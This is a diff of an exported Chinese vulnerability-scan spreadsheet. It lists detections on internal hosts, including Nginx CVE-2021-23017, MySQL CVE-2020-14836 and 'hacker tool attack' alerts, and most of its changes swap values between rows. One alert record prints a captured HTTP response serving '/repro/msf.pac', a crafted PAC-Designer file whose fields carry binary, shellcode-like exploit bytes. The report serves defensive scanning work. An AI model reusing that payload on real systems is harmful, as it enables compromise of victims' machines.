-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T18" t="inlineStr">
@@ -3059,12 +3059,12 @@
       </c>
       <c r="M19" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N19" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O19" t="inlineStr">
@@ -3074,7 +3074,7 @@
       </c>
       <c r="P19" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q19" t="inlineStr"/>
@@ -3085,7 +3085,7 @@
       </c>
       <c r="S19" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T19" t="inlineStr">
@@ -3171,7 +3171,7 @@
       </c>
       <c r="H20" t="inlineStr">
         <is>
-          <t>SIP</t>
+          <t>STA、SIP</t>
         </is>
       </c>
       <c r="I20" t="inlineStr">
@@ -3192,7 +3192,7 @@
       </c>
       <c r="M20" t="inlineStr">
         <is>
-          <t>192.200.41.126</t>
+          <t>192.200.42.215</t>
         </is>
       </c>
       <c r="N20" t="inlineStr">
@@ -3205,7 +3205,11 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P20" t="inlineStr"/>
+      <c r="P20" t="inlineStr">
+        <is>
+          <t>子组名</t>
+        </is>
+      </c>
       <c r="Q20" t="inlineStr"/>
       <c r="R20" t="inlineStr">
         <is>
@@ -3224,7 +3228,7 @@
       </c>
       <c r="U20" t="inlineStr">
         <is>
-          <t>192.200.41.126/repro/msf.pac</t>
+          <t>192.200.42.215/winamp.ini</t>
         </is>
       </c>
       <c r="V20" t="inlineStr">
@@ -3233,158 +3237,6 @@
         </is>
       </c>
       <c r="W20" t="inlineStr">
-        <is>
-          <t>页面url: 192.200.41.126/repro/msf.pac
-请求体: GET /repro/msf.pac HTTP/1.1
-Host: 192.200.41.126
-Connection: keep-alive
-User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Referer: http://192.200.41.126/repro/
-Accept-Encoding: gzip,deflate,sdch
-Accept-Language: zh-CN,zh;q=0.8
-Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
-响应体: HTTP/1.1 200 OK
-Date: Thu, 05 Jul 2012 08:27:57 GMT
-Server: Apache/2.2.15 (Win32) PHP/5.2.13
-Last-Modified: Thu, 05 Jul 2012 07:39:53 GMT
-ETag: "4000000004d60-314-4c41040db73c8"
-Accept-Ranges: bytes
-Content-Length: 788
-Keep-Alive: timeout=5, max=100
-Connection: Keep-Alive
-Content-Type: text/plain
-&lt;?xml version="1.0"?&gt;
-&lt;PacDesignData&gt;
-  &lt;DocFmtVersion&gt;1&lt;/DocFmtVersion&gt;
-  &lt;DeviceType&gt;ispPAC-CLK5410D&lt;/DeviceType&gt;
-  &lt;CreatedBy&gt;PAC-Designer 6.21.1336&lt;/CreatedBy&gt;
-  &lt;SummaryInformation&gt;
-    &lt;Title&gt;�ľ�H\�t$�[1ɱ31s�sP�_�!��W_��(�B��A�!'�r�#�V�%G��vgYǿ�h�
-�+�SwqV�v�e0Yc!�X�1�͂��V�g�hjȭ�(��M�|�`�Q`��ݡ+�*�hh�1*�GA�e�*�i�uJi�u��U�ЪDtp#�.�W1�)�v�b�x?��Q�&lt;/Title&gt;
-    &lt;Author&gt;eWockK&lt;/Author&gt;
-  &lt;/SummaryInformation&gt;
-  &lt;SymbolicSchematicData&gt;
-    &lt;Symbol&gt;
-      &lt;SymKey&gt;153&lt;/SymKey&gt;
-      &lt;NameText&gt;Profile 0 Ref Frequency&lt;/NameText&gt;
-      &lt;Value&gt;__\aaaaaaQ�QunfgpIcguMsPZpAZDzGHTxSQpnvmfxkWBqTuWmXfPTbECGIXeZftoUOFsHvncyJRZCRyvkxvaFtiwknBFWPZ�Lq P�&lt;/Value&gt;
-    &lt;/Symbol&gt;
-  &lt;/SymbolicSchematicData&gt;
-&lt;/PacDesignData&gt;</t>
-        </is>
-      </c>
-      <c r="X20" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y20" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="21">
-      <c r="A21" t="inlineStr">
-        <is>
-          <t>利用工具</t>
-        </is>
-      </c>
-      <c r="B21" t="inlineStr">
-        <is>
-          <t>建议修复</t>
-        </is>
-      </c>
-      <c r="C21" t="inlineStr">
-        <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D21" t="inlineStr">
-        <is>
-          <t>黑客工具攻击</t>
-        </is>
-      </c>
-      <c r="E21" t="inlineStr"/>
-      <c r="F21" t="inlineStr">
-        <is>
-          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
-        </is>
-      </c>
-      <c r="G21" t="inlineStr">
-        <is>
-          <t>活跃漏洞</t>
-        </is>
-      </c>
-      <c r="H21" t="inlineStr">
-        <is>
-          <t>SIP、STA</t>
-        </is>
-      </c>
-      <c r="I21" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J21" t="inlineStr"/>
-      <c r="K21" t="inlineStr">
-        <is>
-          <t>2026-07-13 20:02</t>
-        </is>
-      </c>
-      <c r="L21" t="inlineStr">
-        <is>
-          <t>2026-07-13 20:02</t>
-        </is>
-      </c>
-      <c r="M21" t="inlineStr">
-        <is>
-          <t>192.200.42.215</t>
-        </is>
-      </c>
-      <c r="N21" t="inlineStr">
-        <is>
-          <t>终端</t>
-        </is>
-      </c>
-      <c r="O21" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P21" t="inlineStr">
-        <is>
-          <t>子组名</t>
-        </is>
-      </c>
-      <c r="Q21" t="inlineStr"/>
-      <c r="R21" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S21" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T21" t="inlineStr">
-        <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="U21" t="inlineStr">
-        <is>
-          <t>192.200.42.215/winamp.ini</t>
-        </is>
-      </c>
-      <c r="V21" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W21" t="inlineStr">
         <is>
           <t xml:space="preserve">页面url: 192.200.42.215/winamp.ini
 请求体: GET /winamp.ini HTTP/1.1
@@ -3442,6 +3294,154 @@
 </t>
         </is>
       </c>
+      <c r="X20" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y20" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>利用工具</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t>建议修复</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr">
+        <is>
+          <t>黑客工具攻击</t>
+        </is>
+      </c>
+      <c r="E21" t="inlineStr"/>
+      <c r="F21" t="inlineStr">
+        <is>
+          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
+        </is>
+      </c>
+      <c r="G21" t="inlineStr">
+        <is>
+          <t>活跃漏洞</t>
+        </is>
+      </c>
+      <c r="H21" t="inlineStr">
+        <is>
+          <t>SIP</t>
+        </is>
+      </c>
+      <c r="I21" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J21" t="inlineStr"/>
+      <c r="K21" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="L21" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="M21" t="inlineStr">
+        <is>
+          <t>192.200.41.126</t>
+        </is>
+      </c>
+      <c r="N21" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O21" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P21" t="inlineStr"/>
+      <c r="Q21" t="inlineStr"/>
+      <c r="R21" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S21" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T21" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="U21" t="inlineStr">
+        <is>
+          <t>192.200.41.126/repro/msf.pac</t>
+        </is>
+      </c>
+      <c r="V21" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W21" t="inlineStr">
+        <is>
+          <t>页面url: 192.200.41.126/repro/msf.pac
+请求体: GET /repro/msf.pac HTTP/1.1
+Host: 192.200.41.126
+Connection: keep-alive
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Referer: http://192.200.41.126/repro/
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: zh-CN,zh;q=0.8
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+响应体: HTTP/1.1 200 OK
+Date: Thu, 05 Jul 2012 08:27:57 GMT
+Server: Apache/2.2.15 (Win32) PHP/5.2.13
+Last-Modified: Thu, 05 Jul 2012 07:39:53 GMT
+ETag: "4000000004d60-314-4c41040db73c8"
+Accept-Ranges: bytes
+Content-Length: 788
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/plain
+&lt;?xml version="1.0"?&gt;
+&lt;PacDesignData&gt;
+  &lt;DocFmtVersion&gt;1&lt;/DocFmtVersion&gt;
+  &lt;DeviceType&gt;ispPAC-CLK5410D&lt;/DeviceType&gt;
+  &lt;CreatedBy&gt;PAC-Designer 6.21.1336&lt;/CreatedBy&gt;
+  &lt;SummaryInformation&gt;
+    &lt;Title&gt;�ľ�H\�t$�[1ɱ31s�sP�_�!��W_��(�B��A�!'�r�#�V�%G��vgYǿ�h�
+�+�SwqV�v�e0Yc!�X�1�͂��V�g�hjȭ�(��M�|�`�Q`��ݡ+�*�hh�1*�GA�e�*�i�uJi�u��U�ЪDtp#�.�W1�)�v�b�x?��Q�&lt;/Title&gt;
+    &lt;Author&gt;eWockK&lt;/Author&gt;
+  &lt;/SummaryInformation&gt;
+  &lt;SymbolicSchematicData&gt;
+    &lt;Symbol&gt;
+      &lt;SymKey&gt;153&lt;/SymKey&gt;
+      &lt;NameText&gt;Profile 0 Ref Frequency&lt;/NameText&gt;
+      &lt;Value&gt;__\aaaaaaQ�QunfgpIcguMsPZpAZDzGHTxSQpnvmfxkWBqTuWmXfPTbECGIXeZftoUOFsHvncyJRZCRyvkxvaFtiwknBFWPZ�Lq P�&lt;/Value&gt;
+    &lt;/Symbol&gt;
+  &lt;/SymbolicSchematicData&gt;
+&lt;/PacDesignData&gt;</t>
+        </is>
+      </c>
       <c r="X21" t="inlineStr">
         <is>
           <t>待处置</t>
@@ -4520,7 +4520,7 @@
     <row r="30">
       <c r="A30" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B30" t="inlineStr">
@@ -4530,18 +4530,18 @@
       </c>
       <c r="C30" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D30" t="inlineStr"/>
       <c r="E30" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F30" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G30" t="inlineStr">
@@ -4561,7 +4561,7 @@
       </c>
       <c r="J30" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K30" t="inlineStr">
@@ -4653,7 +4653,7 @@
     <row r="31">
       <c r="A31" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B31" t="inlineStr">
@@ -4663,18 +4663,18 @@
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D31" t="inlineStr"/>
       <c r="E31" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F31" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -4694,7 +4694,7 @@
       </c>
       <c r="J31" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K31" t="inlineStr">
@@ -5318,7 +5318,7 @@
     <row r="36">
       <c r="A36" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B36" t="inlineStr">
@@ -5328,18 +5328,18 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D36" t="inlineStr"/>
       <c r="E36" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F36" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -5359,7 +5359,7 @@
       </c>
       <c r="J36" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K36" t="inlineStr">
@@ -5374,12 +5374,12 @@
       </c>
       <c r="M36" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.54.174</t>
         </is>
       </c>
       <c r="N36" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O36" t="inlineStr">
@@ -5400,7 +5400,7 @@
       </c>
       <c r="S36" t="inlineStr">
         <is>
-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T36" t="inlineStr">
@@ -5511,7 +5511,7 @@
       </c>
       <c r="M37" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N37" t="inlineStr">
@@ -5526,7 +5526,7 @@
       </c>
       <c r="P37" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q37" t="inlineStr"/>
@@ -5592,7 +5592,7 @@
     <row r="38">
       <c r="A38" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B38" t="inlineStr">
@@ -5602,18 +5602,18 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D38" t="inlineStr"/>
       <c r="E38" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F38" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G38" t="inlineStr">
@@ -5633,7 +5633,7 @@
       </c>
       <c r="J38" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K38" t="inlineStr">
@@ -5648,12 +5648,12 @@
       </c>
       <c r="M38" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N38" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O38" t="inlineStr">
@@ -5663,7 +5663,7 @@
       </c>
       <c r="P38" t="inlineStr">
         <is>
-          <t>父组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q38" t="inlineStr"/>
@@ -5674,7 +5674,7 @@
       </c>
       <c r="S38" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T38" t="inlineStr">
@@ -5729,7 +5729,7 @@
     <row r="39">
       <c r="A39" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B39" t="inlineStr">
@@ -5739,18 +5739,18 @@
       </c>
       <c r="C39" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D39" t="inlineStr"/>
       <c r="E39" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F39" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G39" t="inlineStr">
@@ -5770,7 +5770,7 @@
       </c>
       <c r="J39" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K39" t="inlineStr">
@@ -5785,12 +5785,12 @@
       </c>
       <c r="M39" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N39" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O39" t="inlineStr">
@@ -5800,7 +5800,7 @@
       </c>
       <c r="P39" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q39" t="inlineStr"/>
@@ -5811,7 +5811,7 @@
       </c>
       <c r="S39" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T39" t="inlineStr">
@@ -5922,7 +5922,7 @@
       </c>
       <c r="M40" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N40" t="inlineStr">
@@ -5937,7 +5937,7 @@
       </c>
       <c r="P40" t="inlineStr">
         <is>
-          <t>父组名</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q40" t="inlineStr"/>
@@ -6003,7 +6003,7 @@
     <row r="41">
       <c r="A41" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B41" t="inlineStr">
@@ -6013,18 +6013,18 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D41" t="inlineStr"/>
       <c r="E41" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F41" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G41" t="inlineStr">
@@ -6044,7 +6044,7 @@
       </c>
       <c r="J41" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K41" t="inlineStr">
@@ -6059,7 +6059,7 @@
       </c>
       <c r="M41" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.68</t>
         </is>
       </c>
       <c r="N41" t="inlineStr">
@@ -6074,7 +6074,7 @@
       </c>
       <c r="P41" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>父组名</t>
         </is>
       </c>
       <c r="Q41" t="inlineStr"/>
@@ -6140,7 +6140,7 @@
     <row r="42">
       <c r="A42" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B42" t="inlineStr">
@@ -6150,18 +6150,18 @@
       </c>
       <c r="C42" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D42" t="inlineStr"/>
       <c r="E42" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F42" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G42" t="inlineStr">
@@ -6181,7 +6181,7 @@
       </c>
       <c r="J42" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K42" t="inlineStr">
@@ -6196,12 +6196,12 @@
       </c>
       <c r="M42" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.54.68</t>
         </is>
       </c>
       <c r="N42" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O42" t="inlineStr">
@@ -6211,7 +6211,7 @@
       </c>
       <c r="P42" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>父组名</t>
         </is>
       </c>
       <c r="Q42" t="inlineStr"/>
@@ -6222,7 +6222,7 @@
       </c>
       <c r="S42" t="inlineStr">
         <is>
-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T42" t="inlineStr">
@@ -6277,7 +6277,7 @@
     <row r="43">
       <c r="A43" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B43" t="inlineStr">
@@ -6287,18 +6287,18 @@
       </c>
       <c r="C43" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D43" t="inlineStr"/>
       <c r="E43" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F43" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
